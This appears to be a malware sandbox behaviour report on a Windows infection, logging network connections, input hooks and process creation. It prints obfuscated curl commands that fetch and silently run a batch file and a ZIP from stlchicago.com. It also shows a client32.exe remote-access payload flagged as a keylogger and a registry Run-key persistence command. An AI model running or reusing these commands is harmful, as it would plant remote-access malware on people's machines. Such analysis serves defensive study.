Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.168.117.169:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49783 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global event hook (focus changed)

Source: C:\Windows\System32\osk.exe

Windows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULL

Jump to behavior

Installs a global keyboard hook

Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4308 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4308 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 shell C:\Windows\system32\OskSupport.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6400 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 6400 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4000 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4000 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4208 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4208 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 7940 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 7940 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior

Installs a global mouse hook

Source: C:\Windows\System32\osk.exe

Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe

Jump to behavior

Yara detected Keylogger Generic

Source: Yara match

File source: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL, type: DROPPED

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

Process Stats: CPU usage > 24%

PE file contains more sections than normal

Source: avutil-59.dll.31.dr	Static PE information: Number of sections : 12 > 10
Source: libopus-0.dll0.31.dr	Static PE information: Number of sections : 11 > 10
Source: libopus-0.dll.31.dr	Static PE information: Number of sections : 11 > 10
Source: libopus-0.dll1.31.dr	Static PE information: Number of sections : 11 > 10
Source: avutil-59.dll0.31.dr	Static PE information: Number of sections : 12 > 10
Source: avutil-59.dll1.31.dr	Static PE information: Number of sections : 12 > 10

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f

Source: classification engine

Classification label: mal96.phis.spyw.win@76/248@600/22

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\osk.exe	Mutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03

Source: C:\Windows\System32\conhost.exe

Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini

Jump to behavior

Source: C:\Windows\System32\osk.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
Source: unknown	Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknown	Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat

Source: C:\Windows\System32\osk.exe	Section loaded: osksupport.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wmsgapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: mstextprediction.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
